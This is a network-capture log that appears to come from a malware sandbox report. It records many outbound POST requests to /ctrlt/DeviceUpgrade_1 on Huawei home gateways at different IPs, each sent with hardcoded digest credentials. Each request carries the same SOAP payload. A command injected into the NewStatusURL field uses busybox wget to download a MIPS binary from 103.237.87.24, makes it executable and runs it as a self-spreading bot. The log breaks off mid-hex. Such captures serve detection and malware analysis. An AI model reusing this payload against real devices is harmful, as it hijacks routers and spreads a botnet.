                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  366192.168.2.1352576157.82.43.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100632906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  367192.168.2.134746041.54.95.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100636005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  368192.168.2.1345188157.126.102.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100636005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  369192.168.2.134295041.184.176.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100636005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  370192.168.2.1335774197.149.95.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100656033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  371192.168.2.1333940157.23.75.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100657940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  372192.168.2.1333830157.181.88.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100676060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  373192.168.2.1333564181.25.48.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100697994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  374192.168.2.1358422157.197.48.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100697994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  375192.168.2.1337904157.104.123.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.100718021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 